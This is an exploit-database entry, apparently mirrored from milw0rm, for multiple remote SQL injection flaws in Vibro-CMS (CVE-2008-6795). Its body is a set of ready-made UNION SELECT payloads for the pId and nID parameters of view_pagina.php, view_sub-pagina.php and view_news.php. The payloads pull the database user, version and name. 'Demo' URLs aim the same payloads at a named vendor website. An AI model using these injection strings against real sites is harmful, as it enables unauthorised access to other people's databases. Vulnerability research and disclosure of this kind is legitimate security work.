[] NeoSense
E X P L O I T S
title author type platform port cve id

Vibro-CMS - Multiple SQL Injections

Author: StAkeR
type: webapps
platform: php
port: 
date_added: 2008-11-03 
date_updated:  
verified: 1 
codes: OSVDB-54277;CVE-2008-6795 
tags: 
aliases:  
screenshot_url:  
application_url: 
/*
   -------------------------------------------------------
   Vibro-CMS Multiple Remote SQL Injection Vulnerabilities
   -------------------------------------------------------
   Discovered By StAkeR[at]hotmail[dot]it
   http://www.niclor.net/prodotti/Vibro-CMS
   -------------------------------------------------------

   * Remote SQL Injection
   * Note: Works Regardless PHP.ini Settings

   - view_pagina.php?pId=1 union select null,concat_ws(0x3a,user(),version(),database()),null/*
   - view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
   - view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*

   * Demo

   - http://www.niclor.net/prodotti/Vibro-CMS/view_pagina.php?pId=1 union select 0,concat_ws(0x3a,user(),version(),database()),0/*
   - http://www.niclor.net/prodotti/Vibro-CMS/ view_sub-pagina.php?pId=1 union select 0,concat(database(),0x3a,user()),version(),3/*
   - http://www.niclor.net/prodotti/Vibro-CMS/view_news.php?nID=4 union select 0,0,user(),1,2,3,4,database(),6,7,8,version(),0/*



*/

# milw0rm.com [2008-11-04]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.